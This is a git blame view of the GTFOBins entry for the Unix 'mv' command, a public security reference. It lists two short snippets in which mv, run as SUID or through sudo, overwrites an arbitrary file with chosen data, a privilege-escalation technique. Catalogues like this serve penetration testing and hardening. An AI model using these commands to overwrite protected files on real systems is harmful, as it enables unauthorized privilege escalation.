GTFOBins.github.io/_gtfobins/mv.md

17 lines
391 B
Markdown
Raw Normal View History

2018-09-03 20:38:22 +00:00
---
2018-09-03 20:40:09 +00:00
description: This can be used to move and then read or write files from a restricted file systems or with elevated privileges.
2018-09-03 20:38:22 +00:00
functions:
2018-10-05 17:55:38 +00:00
suid:
2018-09-03 20:38:22 +00:00
- code: |
LFILE=file_to_write
TF=$(mktemp)
echo "DATA" > $TF
./mv $TF $LFILE
2018-10-05 17:55:38 +00:00
sudo:
2018-09-03 20:38:22 +00:00
- code: |
LFILE=file_to_write
TF=$(mktemp)
echo "DATA" > $TF
sudo mv $TF $LFILE
---